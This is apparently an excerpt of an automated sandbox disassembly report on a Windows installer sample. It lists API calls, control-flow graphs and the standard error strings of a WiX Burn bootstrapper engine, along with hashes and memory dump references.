                                                            • Instruction Fuzzy Hash: D3218B7590031CABCB109FA9DC45BEEBBB8EB19724F14411AEA14B73C1D7B09904CBB1
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00D6B5FC,00000000,?,?,?,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D3FEF4
                                                            • GetCurrentProcessId.KERNEL32(00000000,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D3FF04
                                                            • GetCurrentThreadId.KERNEL32 ref: 00D3FF0D
                                                            • GetLocalTime.KERNEL32(8000FFFF,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D3FF23
                                                            • LeaveCriticalSection.KERNEL32(00D6B5FC,00D1E93B,?,00000000,0000FDE9,?,00D1E93B,8000FFFF,Unexpected return value from message pump.), ref: 00D4001A
                                                            Strings
                                                            • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 00D3FFC0
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                            • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                            • API String ID: 296830338-59366893
                                                            • Opcode ID: c7563023ef0d6df31226cf9df1a745b10ee7708a6b17b2b6b9a5bb607834a5af
                                                            • Instruction ID: 514d67b710137f627072442ae9039a5854ecf37dafd2f4f4ba585d52bb8875e7
                                                            • Opcode Fuzzy Hash: c7563023ef0d6df31226cf9df1a745b10ee7708a6b17b2b6b9a5bb607834a5af
                                                            • Instruction Fuzzy Hash: D5416071D01219ABDB21DFA4DC05ABEBBB8EF18B21F044426F901EA250D735CD85DBB1
                                                            Strings
                                                            • Failed to copy working folder., xrefs: 00D1A116
                                                            • Failed to calculate working folder to ensure it exists., xrefs: 00D1A0D8
                                                            • Failed create working folder., xrefs: 00D1A0EE
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryErrorLastProcessWindows
                                                            • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                            • API String ID: 3841436932-2072961686
                                                            • Opcode ID: a44ba17f94133b5a8fe79d3fadaca84445fd191a64e3fd4e511260b790a149dd
                                                            • Instruction ID: 99a029e8fb63a9b82cc61b469e5edabba41fc394b2aef515e975178b2faab214
                                                            • Opcode Fuzzy Hash: a44ba17f94133b5a8fe79d3fadaca84445fd191a64e3fd4e511260b790a149dd
                                                            • Instruction Fuzzy Hash: 27018432902628FB8F225B59EC06CDEBB79DF95721B604256FC0077211DF31DE80A6B6
                                                            APIs
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00D0E058
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00D0E736
                                                              • Part of subcall function 00D0394F: GetProcessHeap.KERNEL32(?,?,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03960
                                                              • Part of subcall function 00D0394F: RtlAllocateHeap.NTDLL(00000000,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03967
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeHeapString$AllocateProcess
                                                            • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                            • API String ID: 336948655-2953049543
                                                            • Opcode ID: 4342b9a3c373ff442c0b950d65c15fe48d325f31544675784fd98fe6ad62448d
                                                            • Instruction ID: df1998c979a30bee7933bc4467357e54b295c4711a404fd394f0a6bb3dd5b1a1
                                                            • Opcode Fuzzy Hash: 4342b9a3c373ff442c0b950d65c15fe48d325f31544675784fd98fe6ad62448d
                                                            • Instruction Fuzzy Hash: 2032BF31D40226AFDF119BA4CC46FAEBBA4AF14721F144A65ED18BB2D0D771ED049BB0

                                                            Control-flow Graph (graph image and raw edge list not reproduced)
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: StringVariant$AllocClearFreeInit
                                                            • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                            • API String ID: 760788290-2956246334
                                                            • Opcode ID: 189f43f585c605078b9d6b58ea3551f38ac593942c374d17896c972480457097
                                                            • Instruction ID: 3920d5942cd28879f95d6d5a8bd3aac3bc7faf93831a41b3266e0d1dcaecb660
                                                            • Opcode Fuzzy Hash: 189f43f585c605078b9d6b58ea3551f38ac593942c374d17896c972480457097
                                                            • Instruction Fuzzy Hash: D1E1D236E44666BFCF3197A4CC42FAEBAA4AF01711F250271BD19B69D1C7A09D0C96F0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 396 d0b48b-d0b500 call d2f8e0 * 2 401 d0b502-d0b50c GetLastError 396->401 402 d0b538-d0b53e 396->402 405 d0b519 401->405 406 d0b50e-d0b517 401->406 403 d0b540 402->403 404 d0b542-d0b554 SetFilePointerEx 402->404 403->404 407 d0b556-d0b560 GetLastError 404->407 408 d0b588-d0b5a2 ReadFile 404->408 409 d0b520-d0b52d call d03821 405->409 410 d0b51b 405->410 406->405 412 d0b562-d0b56b 407->412 413 d0b56d 407->413 414 d0b5a4-d0b5ae GetLastError 408->414 415 d0b5d9-d0b5e0 408->415 425 d0b532-d0b533 409->425 410->409 412->413 419 d0b574-d0b586 call d03821 413->419 420 d0b56f 413->420 421 d0b5b0-d0b5b9 414->421 422 d0b5bb 414->422 417 d0b5e6-d0b5ef 415->417 418 d0bbd7-d0bbeb call d03821 415->418 417->418 427 d0b5f5-d0b605 SetFilePointerEx 417->427 438 d0bbf0 418->438 419->425 420->419 421->422 423 d0b5c2-d0b5d4 call d03821 422->423 424 d0b5bd 422->424 423->425 424->423 430 d0bbf1-d0bbf7 call d40237 425->430 432 d0b607-d0b611 GetLastError 427->432 433 d0b63c-d0b654 ReadFile 427->433 452 d0bbf8-d0bc0a call d2e06f 430->452 440 d0b613-d0b61c 432->440 441 d0b61e 432->441 435 d0b656-d0b660 GetLastError 433->435 436 d0b68b-d0b692 433->436 442 d0b662-d0b66b 435->442 443 d0b66d 435->443 445 d0b698-d0b6a2 436->445 446 d0bbbc-d0bbd5 call d03821 436->446 438->430 440->441 447 d0b620 441->447 448 d0b625-d0b632 call d03821 441->448 442->443 450 d0b674-d0b681 call d03821 443->450 451 d0b66f 443->451 445->446 453 d0b6a8-d0b6cb SetFilePointerEx 445->453 446->438 447->448 448->433 450->436 451->450 458 d0b702-d0b71a ReadFile 453->458 459 d0b6cd-d0b6d7 GetLastError 453->459 461 d0b751-d0b769 ReadFile 458->461 462 d0b71c-d0b726 GetLastError 458->462 465 d0b6e4 459->465 466 d0b6d9-d0b6e2 459->466 469 d0b7a0-d0b7bb SetFilePointerEx 461->469 470 d0b76b-d0b775 GetLastError 461->470 467 d0b733 462->467 468 d0b728-d0b731 462->468 471 d0b6e6 465->471 472 d0b6eb-d0b6f8 call d03821 465->472 466->465 476 d0b735 467->476 477 
d0b73a-d0b747 call d03821 467->477 468->467 474 d0b7f5-d0b814 ReadFile 469->474 475 d0b7bd-d0b7c7 GetLastError 469->475 478 d0b782 470->478 479 d0b777-d0b780 470->479 471->472 472->458 480 d0b81a-d0b81c 474->480 481 d0bb7d-d0bb87 GetLastError 474->481 485 d0b7d4 475->485 486 d0b7c9-d0b7d2 475->486 476->477 477->461 482 d0b784 478->482 483 d0b789-d0b796 call d03821 478->483 479->478 488 d0b81d-d0b824 480->488 490 d0bb94 481->490 491 d0bb89-d0bb92 481->491 482->483 483->469 492 d0b7d6 485->492 493 d0b7db-d0b7eb call d03821 485->493 486->485 495 d0bb58-d0bb75 call d03821 488->495 496 d0b82a-d0b836 488->496 498 d0bb96 490->498 499 d0bb9b-d0bbb1 call d03821 490->499 491->490 492->493 493->474 511 d0bb7a-d0bb7b 495->511 502 d0b841-d0b84a 496->502 503 d0b838-d0b83f 496->503 498->499 516 d0bbb2-d0bbba call d40237 499->516 508 d0b850-d0b876 ReadFile 502->508 509 d0bb1b-d0bb32 call d03821 502->509 503->502 507 d0b884-d0b88b 503->507 513 d0b8b4-d0b8cb call d0394f 507->513 514 d0b88d-d0b8af call d03821 507->514 508->481 512 d0b87c-d0b882 508->512 522 d0bb37-d0bb3d call d40237 509->522 511->516 512->488 526 d0b8cd-d0b8ea call d03821 513->526 527 d0b8ef-d0b904 SetFilePointerEx 513->527 514->511 516->452 537 d0bb43-d0bb44 522->537 526->430 528 d0b944-d0b969 ReadFile 527->528 529 d0b906-d0b910 GetLastError 527->529 535 d0b9a0-d0b9ac 528->535 536 d0b96b-d0b975 GetLastError 528->536 533 d0b912-d0b91b 529->533 534 d0b91d 529->534 533->534 538 d0b924-d0b934 call d03821 534->538 539 d0b91f 534->539 540 d0b9ae-d0b9ca call d03821 535->540 541 d0b9cf-d0b9d3 535->541 542 d0b982 536->542 543 d0b977-d0b980 536->543 544 d0bb45-d0bb47 537->544 561 d0b939-d0b93f call d40237 538->561 539->538 540->522 549 d0b9d5-d0ba09 call d03821 call d40237 541->549 550 d0ba0e-d0ba21 call d44a05 541->550 545 d0b984 542->545 546 d0b989-d0b99e call d03821 542->546 543->542 544->452 551 d0bb4d-d0bb53 call d03a16 544->551 545->546 546->561 549->544 563 d0ba23-d0ba28 550->563 564 d0ba2d-d0ba37 550->564 551->452 
561->537 563->561 567 d0ba41-d0ba49 564->567 568 d0ba39-d0ba3f 564->568 572 d0ba55-d0ba58 567->572 573 d0ba4b-d0ba53 567->573 571 d0ba5a-d0baba call d0394f 568->571 576 d0babc-d0bad8 call d03821 571->576 577 d0bade-d0baff call d2f360 call d0b208 571->577 572->571 573->571 576->577 577->544 584 d0bb01-d0bb11 call d03821 577->584 584->509
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B502
                                                            • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B550
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B556
                                                            • ReadFile.KERNELBASE(00000000,00D04461,00000040,?,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B59E
                                                            • GetLastError.KERNEL32(?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B5A4
                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B601
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B607
                                                            • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B650
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B656
                                                            • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B6C7
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B6CD
                                                            • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B716
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B71C
                                                            • ReadFile.KERNEL32(00000000,?,00000004,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B765
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B76B
                                                            • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B7B7
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B7BD
                                                              • Part of subcall function 00D0394F: GetProcessHeap.KERNEL32(?,?,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03960
                                                              • Part of subcall function 00D0394F: RtlAllocateHeap.NTDLL(00000000,?,00D02274,?,00000001,75C0B390,8000FFFF,?,?,00D40267,?,?,00000000,00000000,8000FFFF), ref: 00D03967
                                                            • ReadFile.KERNEL32(00000000,?,00000028,00000018,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B810
                                                            • ReadFile.KERNEL32(00000000,?,00000028,00000028,00000000,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B872
                                                            • SetFilePointerEx.KERNELBASE(00000000,?,00000000,00000000,00000000,00000034,00000001,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B8FC
                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 00D0B906
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorLast$Read$Pointer$Heap$AllocateProcess
                                                            • String ID: ($.wix$4$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to engine process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                            • API String ID: 3411815225-695169583
                                                            • Opcode ID: b18ee4a990094f653549b4929ba96690b0c06b10cf22971d60d2a5302e37dbd1
                                                            • Instruction ID: ea61a453fba0c45d2692553242233e1223d8ce075925d292b3f2a18ab04be4f4
                                                            • Opcode Fuzzy Hash: b18ee4a990094f653549b4929ba96690b0c06b10cf22971d60d2a5302e37dbd1
                                                            • Instruction Fuzzy Hash: 4112C176A44235ABDB309B558C49FAA7BA8EB45B20F1541A6FD0CBB2C1D770DD408BF0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 587 d20d16-d20d2d SetEvent 588 d20d6f-d20d7d WaitForSingleObject 587->588 589 d20d2f-d20d39 GetLastError 587->589 590 d20db4-d20dbf ResetEvent 588->590 591 d20d7f-d20d89 GetLastError 588->591 592 d20d46 589->592 593 d20d3b-d20d44 589->593 596 d20dc1-d20dcb GetLastError 590->596 597 d20df9-d20dff 590->597 594 d20d96 591->594 595 d20d8b-d20d94 591->595 598 d20d48 592->598 599 d20d4d-d20d5d call d03821 592->599 593->592 602 d20d98 594->602 603 d20d9d-d20db2 call d03821 594->603 595->594 604 d20dd8 596->604 605 d20dcd-d20dd6 596->605 600 d20e32-d20e4b call d021ac 597->600 601 d20e01-d20e04 597->601 598->599 614 d20d62-d20d6a call d40237 599->614 623 d20e63-d20e6e SetEvent 600->623 624 d20e4d-d20e5e call d40237 600->624 610 d20e06-d20e23 call d03821 601->610 611 d20e28-d20e2d 601->611 602->603 603->614 607 d20dda 604->607 608 d20ddf-d20df4 call d03821 604->608 605->604 607->608 608->614 630 d210de-d210e4 call d40237 610->630 617 d210e8-d210ed 611->617 614->617 625 d210f2-d210f8 617->625 626 d210ef 617->626 627 d20e70-d20e7a GetLastError 623->627 628 d20ea8-d20eb6 WaitForSingleObject 623->628 638 d210e5-d210e7 624->638 626->625 632 d20e87 627->632 633 d20e7c-d20e85 627->633 634 d20ef0-d20efb ResetEvent 628->634 635 d20eb8-d20ec2 GetLastError 628->635 630->638 641 d20e89 632->641 642 d20e8e-d20ea3 call d03821 632->642 633->632 639 d20f35-d20f3c 634->639 640 d20efd-d20f07 GetLastError 634->640 643 d20ec4-d20ecd 635->643 644 d20ecf 635->644 638->617 649 d20fab-d20fce CreateFileW 639->649 650 d20f3e-d20f41 639->650 646 d20f14 640->646 647 d20f09-d20f12 640->647 641->642 665 d210dd 642->665 643->644 651 d20ed1 644->651 652 d20ed6-d20eeb call d03821 644->652 653 d20f16 646->653 654 d20f1b-d20f30 call d03821 646->654 647->646 656 d20fd0-d20fda GetLastError 649->656 657 d2100b-d2101f SetFilePointerEx 649->657 658 d20f43-d20f46 650->658 659 d20f6e-d20f72 call d0394f 650->659 651->652 652->665 653->654 
654->665 666 d20fe7 656->666 667 d20fdc-d20fe5 656->667 661 d21021-d2102b GetLastError 657->661 662 d21059-d21064 SetEndOfFile 657->662 668 d20f67-d20f69 658->668 669 d20f48-d20f4b 658->669 673 d20f77-d20f7c 659->673 671 d21038 661->671 672 d2102d-d21036 661->672 675 d21066-d21070 GetLastError 662->675 676 d2109b-d210a8 SetFilePointerEx 662->676 665->630 677 d20fe9 666->677 678 d20fee-d21001 call d03821 666->678 667->666 668->617 679 d20f5d-d20f62 669->679 680 d20f4d-d20f53 669->680 684 d2103a 671->684 685 d2103f-d21054 call d03821 671->685 672->671 682 d20f7e-d20f98 call d03821 673->682 683 d20f9d-d20fa6 673->683 686 d21072-d2107b 675->686 687 d2107d 675->687 676->638 681 d210aa-d210b4 GetLastError 676->681 677->678 678->657 679->638 680->679 689 d210c1 681->689 690 d210b6-d210bf 681->690 682->665 683->638 684->685 685->665 686->687 693 d21084-d21099 call d03821 687->693 694 d2107f 687->694 696 d210c3 689->696 697 d210c8-d210d8 call d03821 689->697 690->689 693->665 694->693 696->697 697->665
                                                            APIs
                                                            • SetEvent.KERNEL32(?,?,?,?,?,00D208BC,?,?), ref: 00D20D25
                                                            • GetLastError.KERNEL32(?,?,?,?,00D208BC,?,?), ref: 00D20D2F
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,00D208BC,?,?), ref: 00D20D74
                                                            • GetLastError.KERNEL32(?,?,?,?,00D208BC,?,?), ref: 00D20D7F
                                                            • ResetEvent.KERNEL32(?,?,?,?,?,00D208BC,?,?), ref: 00D20DB7
                                                            • GetLastError.KERNEL32(?,?,?,?,00D208BC,?,?), ref: 00D20DC1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$Event$ObjectResetSingleWait
                                                            • String ID: Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                            • API String ID: 1865021742-2104912459
                                                            • Opcode ID: 50a5bc40d554fe049361cd78298ff1b87ae818969a889c04406d0104b060f7fb
                                                            • Instruction ID: a15fc8a2133478f56c57afd0dc6f4b6474e914a07b6a10f1d5956488417e6fb7
                                                            • Opcode Fuzzy Hash: 50a5bc40d554fe049361cd78298ff1b87ae818969a889c04406d0104b060f7fb
                                                            • Instruction Fuzzy Hash: EE91363BA81732ABD7301AA96E49B2A3D54BF31B35F168321BE14BA6C1D351DC0486F1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 864 d05195-d05243 call d2f8e0 * 2 GetModuleHandleW call d404f8 call d406ae call d0120a 875 d05245 864->875 876 d05259-d0526a call d042d7 864->876 877 d0524a-d05254 call d40237 875->877 881 d05273-d0528f call d05618 CoInitializeEx 876->881 882 d0526c-d05271 876->882 885 d054d4-d054db 877->885 892 d05291-d05296 881->892 893 d05298-d052a4 call d3fcae 881->893 882->877 887 d054e8-d054ea 885->887 888 d054dd-d054e3 call d45636 885->888 890 d054fa-d05518 call d0d82f call d1a8d6 call d1ab24 887->890 891 d054ec-d054f3 887->891 888->887 914 d05546-d05559 call d04fa4 890->914 915 d0551a-d05522 890->915 891->890 894 d054f5 call d141ec 891->894 892->877 901 d052a6 893->901 902 d052b8-d052c7 call d40e07 893->902 894->890 904 d052ab-d052b3 call d40237 901->904 911 d052d0-d052df call d42af7 902->911 912 d052c9-d052ce 902->912 904->885 919 d052e1-d052e6 911->919 920 d052e8-d052f7 call d43565 911->920 912->904 924 d05560-d05567 914->924 925 d0555b call d43a35 914->925 915->914 918 d05524-d05527 915->918 918->914 922 d05529-d05544 call d1434c call d05602 918->922 919->904 933 d05300-d0531f GetVersionExW 920->933 934 d052f9-d052fe 920->934 922->914 930 d05569 call d42efe 924->930 931 d0556e-d05575 924->931 925->924 930->931 936 d05577 call d41479 931->936 937 d0557c-d05583 931->937 939 d05321-d0532b GetLastError 933->939 940 d05359-d0539e call d033c7 call d05602 933->940 934->904 936->937 942 d05585 call d3fdbd 937->942 943 d0558a-d0558c 937->943 948 d05338 939->948 949 d0532d-d05336 939->949 966 d053a0-d053ab call d45636 940->966 967 d053b1-d053c1 call d1752a 940->967 942->943 946 d05594-d0559b 943->946 947 d0558e CoUninitialize 943->947 951 d055d6-d055df call d40113 946->951 952 d0559d-d0559f 946->952 947->946 953 d0533a 948->953 954 d0533f-d05354 call d03821 948->954 949->948 964 d055e1 call d045ee 951->964 965 d055e6-d055ff call d40802 call d2e06f 951->965 957 d055a1-d055a3 952->957 958 d055a5-d055ab 
952->958 953->954 954->904 962 d055ad-d055c6 call d13d85 call d05602 957->962 958->962 962->951 983 d055c8-d055d5 call d05602 962->983 964->965 966->967 979 d053c3 967->979 980 d053cd-d053d6 967->980 979->980 984 d053dc-d053df 980->984 985 d0549e-d054b4 call d04d39 980->985 983->951 988 d053e5-d053e8 984->988 989 d05476-d05489 call d04ae5 984->989 998 d054c0-d054d2 985->998 999 d054b6 985->999 990 d053ea-d053ed 988->990 991 d0544e-d0546a call d048ef 988->991 997 d0548e-d05492 989->997 995 d05426-d05442 call d04a88 990->995 996 d053ef-d053f2 990->996 991->998 1006 d0546c 991->1006 995->998 1010 d05444 995->1010 1002 d05403-d05416 call d04c86 996->1002 1003 d053f4-d053f9 996->1003 997->998 1004 d05494 997->1004 998->885 999->998 1002->998 1011 d0541c 1002->1011 1003->1002 1004->985 1006->989 1010->991 1011->995
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 00D05217
                                                              • Part of subcall function 00D404F8: InitializeCriticalSection.KERNEL32(00D6B5FC,?,00D05223,00000000,?,?,?,?,?,?), ref: 00D4050F
                                                              • Part of subcall function 00D0120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,00D0523F,00000000,?), ref: 00D01248
                                                              • Part of subcall function 00D0120A: GetLastError.KERNEL32(?,?,?,00D0523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00D01252
                                                            • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 00D05285
                                                              • Part of subcall function 00D40E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 00D40E28
                                                            • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 00D05317
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 00D05321
